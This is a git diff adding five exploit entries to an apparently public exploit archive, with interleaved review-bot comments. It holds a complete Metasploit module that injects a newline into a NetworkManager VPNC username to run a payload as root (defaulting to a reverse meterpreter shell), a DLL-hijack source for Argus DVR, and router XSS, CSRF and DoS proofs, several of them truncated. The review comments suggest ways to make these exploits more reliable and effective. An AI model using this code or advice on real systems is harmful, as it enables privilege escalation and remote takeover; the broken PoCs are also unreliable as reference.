diff --git a/exploits/hardware/webapps/45310.txt b/exploits/hardware/webapps/45310.txt
new file mode 100644
index 000000000..9a37975bb
--- /dev/null
+++ b/exploits/hardware/webapps/45310.txt
@@ -0,0 +1,33 @@
+# Title: Vox TG790 ADSL Router - Cross-Site Scripting
+# Author: Cakes
+# Exploit Date: 2018-08-01
+# Vendor: Vox Telecom
+# Link: https://www.vox.co.za/
+# Firmware Version: 6.2.W.1
+# CVE: N/A
+
+# Description
+# Due to improper user iunput management low privilege users are able to create
+# a persistent Cross-Site scripting attack via the phone book function.
+
+# PoC
+POST /cgi/b/_voip_/phonebook/?be=0&l0=2&l1=1&name= HTTP/1.1
+Host: 192.168.1.254
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Referer: https://192.168.1.254/cgi/b/_voip_/pb/?be=0&l0=2&l1=1&name=
+Authorization: Digest username="cakes", realm="SpeedTouch", nonce="0745EHNLF:00-1D-68-52-6C-37:173934:292999", uri="/cgi/b/_voip_/phonebook/?be=0&l0=2&l1=1&name=", response="ab09b54d4b6369496463eb79cfb4b1c2", qop=auth, nc=0000002a, cnonce="8305e26a71dd0ae2"
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 141
+
+0=10&1=&100=Cakes&101=Cakes&102=123123&103=123123123&104=123123&105=123123&106=
+
+# Response
+HTTP/1.0 200 OK
+Cache-Control: no-cache
+Expires: -1
+Content-Type: text/html
\ No newline at end of file
diff --git a/exploits/linux/local/45313.rb b/exploits/linux/local/45313.rb
new file mode 100755
index 000000000..b196e6a8b
--- /dev/null
+++ b/exploits/linux/local/45313.rb
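Review bot: The POST body shown, `0=10&1=&100=Cakes&101=Cakes&102=123123&103=123123123&104=123123&105=123123&106=`, contains no script or markup and is 79 bytes against the declared `Content-Length: 141`, so the stored XSS is not actually demonstrated by the request as written — presumably the injected `<script>` in one of the name fields (100/101) was lost when the file was rendered. The PoC should name the parameter that is stored unescaped and where it is later rendered (the phone book listing, per the description), and give the payload URL-encoded so it survives copy-paste and matches the Content-Length. The recorded Digest `Authorization` header carries a server nonce and response that a fresh session will not accept; a line such as `# replace the Authorization header with a fresh Digest response for your own session` would save readers a confusing 401. `iunput` in the description is a typo for `input`.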
@@ -0,0 +1,148 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Post::Linux::Priv
+ include Msf::Post::Linux::System
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Network Manager VPNC Username Privilege Escalation',
+ 'Description' => %q{
+ This module exploits an injection vulnerability in the Network Manager
+ VPNC plugin to gain root privileges.
+
+ This module uses a new line injection vulnerability in the configured
+ username for a VPN network connection to inject a `Password helper`
+ configuration directive into the connection configuration.
+
+ The specified helper is executed by Network Manager as root when the
+ connection is started.
+
+ Network Manager VPNC versions prior to 1.2.6 are vulnerable.
+
+ This module has been tested successfully with VPNC versions:
+ 1.2.4-4 on Debian 9.0.0 (x64); and
+ 1.1.93-1 on Ubuntu Linux 16.04.4 (x64).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Denis Andzakovic', # Discovery and exploit
+ 'Brendan Coles' # Metasploit
+ ],
+ 'DisclosureDate' => 'Jul 26 2018',
+ 'References' =>
+ [
+ ['CVE', '2018-10900'],
+ ['URL', 'http://seclists.org/oss-sec/2018/q3/51'],
+ ['URL', 'https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc'],
+ ['URL', 'https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4'],
+ ['URL', 'https://security-tracker.debian.org/tracker/CVE-2018-10900'],
+ ['URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-10900.html'],
+ ['URL', 'https://launchpad.net/ubuntu/+source/network-manager-vpnc/0.9.8.6-1ubuntu2.1'],
+ ['URL', 'https://www.debian.org/security/2018/dsa-4253'],
+ ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1605919'],
+ ['URL', 'https://bugzilla.novell.com/show_bug.cgi?id=1101147']
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'SessionTypes' => ['shell', 'meterpreter'],
+ 'Targets' => [['Auto', {}]],
+ 'DefaultOptions' =>
+ {
+ 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
+ 'WfsDelay' => 10,
+ 'PrependFork' => true
+ },
+ 'DefaultTarget' => 0))
+ register_options [
+ OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+ ]
+ end
+
+ def base_dir
+ datastore['WritableDir'].to_s
+ end
+
+ def upload(path, data)
+ print_status "Writing '#{path}' (#{data.size} bytes) ..."
+ rm_f path
+ write_file path, data
+ register_file_for_cleanup path
+ end
+
+ def upload_and_chmodx(path, data)
+ upload path, data
+ cmd_exec "chmod +x '#{path}'"
+ end
+
+ def check
+ unless command_exists? 'nmcli'
+ vprint_error 'Network Manager nmcli utility is not installed'
+ return CheckCode::Safe
+ end
+ vprint_good 'nmcli utility is installed'
+
+ CheckCode::Detected
+ end
+
+ def exploit
+ if is_root?
+ fail_with Failure::BadConfig, 'Session already has root privileges'
+ end
+
+ if check != CheckCode::Detected
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+ end
+
+ @payload_name = ".#{rand_text_alphanumeric rand(10..15)}"
+ payload_path = "#{base_dir}/#{@payload_name}"
+
+ print_status 'Adding VPN connection...'
+ vpn_data = []
+ vpn_data << '+vpn.data "IKE DH Group = dh2"'
+ vpn_data << "+vpn.data 'IPSec ID = #{rand_text_alphanumeric 5..10}'"
+ vpn_data << '+vpn.data "IPSec gateway = 127.0.0.1"'
+ vpn_data << '+vpn.data "IPSec secret-flags = 4"'
+ vpn_data << '+vpn.data "Local Port = 0"'
+ vpn_data << '+vpn.data "NAT Traversal Mode = natt"'
+ vpn_data << '+vpn.data "Perfect Forward Secrecy = server"'
+ vpn_data << '+vpn.data "Vendor = cisco"'
+ vpn_data << '+vpn.data "Xauth password-flags = 4"'
+ vpn_data << "+vpn.data \"Xauth username = #{rand_text_alphanumeric 5..10}\nPassword helper #{payload_path}\""
+ vpn_data << "+vpn.data 'ipsec-secret-type = #{rand_text_alphanumeric 5..10}'"
+ vpn_data << "+vpn.data 'xauth-password-type = #{rand_text_alphanumeric 5..10}'"
+ res = cmd_exec "nmcli connection add con-name #{@payload_name} type vpn ifname '*' vpn-type vpnc -- #{vpn_data.join(' ')}"
+ if res.include? 'Error'
+ fail_with Failure::Unknown, 'Could not create VPN connection'
+ end
+
+ res = cmd_exec 'nmcli connection'
+ unless res.include? @payload_name
+ fail_with Failure::Unknown, 'Could not create VPN connection'
+ end
+
+ print_status 'Uploading payload...'
+ upload_and_chmodx payload_path, generate_payload_exe
+
+ print_status 'Starting VPN connection...'
+ cmd_exec "nmcli connection up #{@payload_name} & echo "
+ end
+
+ def cleanup
+ print_status 'Removing VPN connection...'
+ res = cmd_exec "nmcli connection delete #{@payload_name}"
+ unless res.include? 'successfully deleted'
+ print_warning "Could not remove VPN connection #{@payload_name}"
+ end
+ super
+ end
+end
\ No newline at end of file
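Review bot: `check` returns `CheckCode::Detected` on nothing more than `command_exists? 'nmcli'`, so a host that has NetworkManager but no vpnc plugin, or the fixed plugin (1.2.6 and later per the description), passes the `check != CheckCode::Detected` gate in `exploit` and gets a connection profile written before anything fails. Confirming the plugin is actually installed — and, where the distro's package manager exposes it, that its version is below 1.2.6 — would let `check` return `Safe` or `Appears` instead and avoid leaving artefacts on non-vulnerable hosts. `cleanup` also runs `nmcli connection delete #{@payload_name}` even when `exploit` bailed at `is_root?` or at the check, where `@payload_name` is still nil, so it issues `nmcli connection delete ` with no name and prints a spurious warning; guard it with `return super unless @payload_name`. The `if res.include? 'Error'` test after the add only works if the session captures nmcli's stderr, which I am not sure every shell session does — the following `nmcli connection` listing check is the one that reliably catches a failed add.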
diff --git a/exploits/php/webapps/45314.txt b/exploits/php/webapps/45314.txt new file mode 100644 index 000000000..d0e62c156 --- /dev/null +++ b/exploits/php/webapps/45314.txt @@ -0,0 +1,28 @@ +# Exploit Title: DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password) +# Author: Autism_JH +# Date: 2018-08-30 +# Vendor Homepage: https://github.com/731276192/damicms +# Software Link: https://github.com/731276192/damicms +# Version: 6.0.0 +# CVE: CVE-2018-15844 + +# Description: +# DamiCMS v6.0.0 allows CSRF to change the administrator account's pssword. +# After the administrator login in,open the poc,the administrator account's +# password will been changed to 123123 + +# POC: + + + + +
+ + + + + + +
+
+
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45311.py b/exploits/windows_x86-64/dos/45311.py
new file mode 100755
index 000000000..bf48a35eb
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45311.py
@@ -0,0 +1,27 @@
+# Exploit Title: Acunetix WVS Reporter 10.0 - Denial of Service (PoC)
+# Exploit Author: Ali Alipour
+# Date: 2018-08-22
+# Vendor Homepage : https://www.acunetix.com/
+# Tested on : Windows 10 - 64-bit
+
+# Steps to Reproduce
+# Run the python exploit script, it will create a new
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the Acunetix WVS Reporter 10.0 program.
+# In the new window click "Report Preview" > "Load Report".
+# And upload a sample report >> Then click on the print button .
+# Now Paste the content of "exploit.txt" into the field: " Pages ".
+# Click "OK" and you will see a Crash.
+
+#!/usr/bin/python
+
+buffer = "A" * 20
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/local/45312.c b/exploits/windows_x86/local/45312.c
new file mode 100644
index 000000000..d8f12fd24
--- /dev/null
+++ b/exploits/windows_x86/local/45312.c
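Review bot: The `# POC:` section is empty as rendered here — the auto-submitting HTML form the description refers to appears to have been dropped — so nothing in the visible file names the password-change endpoint or the form fields that carry the new value `123123`. Even when the markup survives, the description should state the target URL and parameter names in prose so the PoC can be rebuilt if the form is lost again; `pssword` and `login in` in the description are typos for `password` and `logs in`.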
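Review bot: `#!/usr/bin/python` sits on line 16, after the header comments, so it is just a comment and the script is not directly executable; it belongs on line 1 or should be dropped (the header says the PoC is run on Windows anyway). The bare `except:` around the file write hides the actual failure and also swallows `KeyboardInterrupt`; `except IOError as e:` with `print "File cannot be created: %s" % e` keeps the message useful. The generated payload is only 20 bytes of `A`, which does not read like the length-based input a DoS PoC usually implies — if the Pages field really crashes on that input, saying so explicitly (and whether it is the non-numeric text rather than the length that triggers it) would make the PoC reproducible.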
@@ -0,0 +1,56 @@
+# Exploit Title: Argus Surveillance DVR 4.0.0.0 - Privilege Escalation
+# Author: John Page (aka hyp3rlinx)
+# Date: 2018-08-29
+# Vendor: Argus Surveillance DVR - 4.0.0.0
+# Software Link: http://www.argussurveillance.com/download/DVR_stp.exe
+# CVE: N/A
+# Tested on: Windows 7 x86
+
+# Description:
+# Argus Surveillance DVR 4.0.0.0 devices allow Trojan File SYSTEM Privilege Escalation.
+# Placing a Trojan File DLL named "gsm_codec.dll" in Argus application directory will
+# lead to arbitrary code execution with SYSTEM integrity
+# Affected Component: DVRWatchdog.exe
+
+# Exploit/POC
+# Create DLL 32bit DLL named "gsm_codec.dll" and place in App Dir,
+# launch Argus DVR tada! your now SYSTEM.
+
+#include
+
+/* hyp3rlinx */
+
+/*
+gcc -c -m32 gsm_codec.c
+gcc -shared -m32 -o gsm_codec.dll gsm_codec.o
+*/
+
+void systemo(){
+ MessageBox( 0, "3c184981367094fce3ab70efc3b44583" , "philbin :)" , MB_YESNO + MB_ICONQUESTION );
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
+ switch(fdwReason){
+ case DLL_PROCESS_ATTACH:{
+ systemo();
+ break;
+ }
+ case DLL_PROCESS_DETACH:{
+ systemo();
+ break;
+ }
+ case DLL_THREAD_ATTACH:{
+ systemo();
+ break;
+ }
+ case DLL_THREAD_DETACH:{
+ systemo();
+ break;
+ }
+ }
+
+ return TRUE;
+}
+
+# https://vimeo.com/287115698
+# Greetz: ***Greetz: indoushka | Eduardo | GGA***
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ba9606898..d0d63efd2 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
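Review bot: The file does not compile as shipped: the `# Exploit Title:` through `# launch Argus DVR ...` header lines and the trailing `# https://vimeo.com ...` lines are not C comments (the preprocessor rejects `# Exploit` as an invalid directive), and the `#include` line names no header — presumably `<windows.h>` was lost in rendering. Wrapping the header and footer in `/* ... */` and restoring `#include <windows.h>` would make the `gcc -shared -m32 -o gsm_codec.dll` recipe in the comment actually work. `MessageBox` from `DllMain` is also a weak proof for the SYSTEM-level hijack the description claims: if `DVRWatchdog.exe` loads the DLL as a service, a GUI box is generally not visible on the user's desktop, and calling `systemo()` on every `DLL_THREAD_ATTACH`/`DLL_THREAD_DETACH` while the loader lock is held is unsafe. Firing once on `DLL_PROCESS_ATTACH` and doing something observable from SYSTEM (writing a marker file to a protected path, or `CreateProcess` of a payload) is the conventional demonstration.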
@@ -6086,6 +6086,7 @@ id,file,description,date,author,type,platform,port
 45301,exploits/windows_x86-64/dos/45301.py,"Trillian 6.1 Build 16 - _Sign In_ Denial of service (PoC)",2018-08-29,"Jose Miguel Gonzalez",dos,windows_x86-64,
 45302,exploits/windows_x86-64/dos/45302.py,"NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)",2018-08-30,"Victor Mondragón",dos,windows_x86-64,
 45304,exploits/windows_x86-64/dos/45304.py,"Nord VPN 6.14.31 - Denial of Service (PoC)",2018-08-30,L0RD,dos,windows_x86-64,
+45311,exploits/windows_x86-64/dos/45311.py,"Acunetix WVS Reporter 10.0 - Denial of Service (PoC)",2018-08-31,"Ali Alipour",dos,windows_x86-64,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9926,6 +9927,8 @@ id,file,description,date,author,type,platform,port
 45280,exploits/windows/local/45280.txt,"Microsoft Windows - Advanced Local Procedure Call (ALPC) Local Privilege Escalation",2018-08-28,SandboxEscaper,local,windows,
 45288,exploits/linux/local/45288.py,"SIPP 3.3 - Stack-Based Buffer Overflow",2018-08-29,"Juan Sacco",local,linux,
 45289,exploits/windows/local/45289.py,"R 3.4.4 - Buffer Overflow (SEH)",2018-08-29,ZwX,local,windows,
+45312,exploits/windows_x86/local/45312.c,"Argus Surveillance DVR 4.0.0.0 - Privilege Escalation",2018-08-31,hyp3rlinx,local,windows_x86,
+45313,exploits/linux/local/45313.rb,"Network Manager VPNC - Username Privilege Escalation (Metasploit)",2018-08-31,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39902,3 +39905,5 @@ id,file,description,date,author,type,platform,port
 45306,exploits/hardware/webapps/45306.txt,"DLink DIR-601 - Credential Disclosure",2018-08-30,"Kevin Randall",webapps,hardware,
 45307,exploits/php/webapps/45307.txt,"WordPress Plugin Quizlord 2.0 - Cross-Site Scripting",2018-08-30,"Renos Nikolaou",webapps,php,
 45309,exploits/windows_x86-64/webapps/45309.txt,"Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting",2018-08-30,"Emre ÖVÜNÇ",webapps,windows_x86-64,
+45310,exploits/hardware/webapps/45310.txt,"Vox TG790 ADSL Router - Cross-Site Scripting",2018-08-31,cakes,webapps,hardware,
+45314,exploits/php/webapps/45314.txt,"DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)",2018-08-31,Autism_JH,webapps,php,